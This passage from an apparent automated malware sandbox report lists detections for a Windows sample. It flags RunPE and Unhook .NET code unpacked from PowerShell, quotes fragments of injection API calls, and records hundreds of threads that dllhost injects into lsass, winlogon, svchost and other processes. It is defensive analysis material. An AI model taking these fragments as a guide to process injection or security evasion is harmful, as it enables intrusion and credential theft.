Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000179537D84B0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_00000179537D8814
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE6538814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	45_2_0000016CE6538814
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE65384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_0000016CE65384B0
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_0000016CE653CD80
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	46_2_000002295D56CD80
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D568814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	46_2_000002295D568814
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D5684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	46_2_000002295D5684B0

HIPS / PFW / Operating System Protection Evasion

.NET source code contains process injector

Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 36.2.powershell.exe.1c2db260000.14.raw.unpack, RunPE.cs	.Net Code: Run contains injection code

.NET source code references suspicious native API functions

Source: 35.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs	Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dllhost.exe

38_2_0000000140002434

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 2F00000
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AEDB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AED82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B3C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B392EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: ECD72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 59072EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 47B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 70062EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 84262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A4182EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 32F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 32F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9DA92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9DAC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 60312EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E2532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E2562EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4C592EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4C5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC7D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CCA02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 83F12EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 83F42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27022EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27052EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 31082EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 310B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: E5E22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4EE25AC
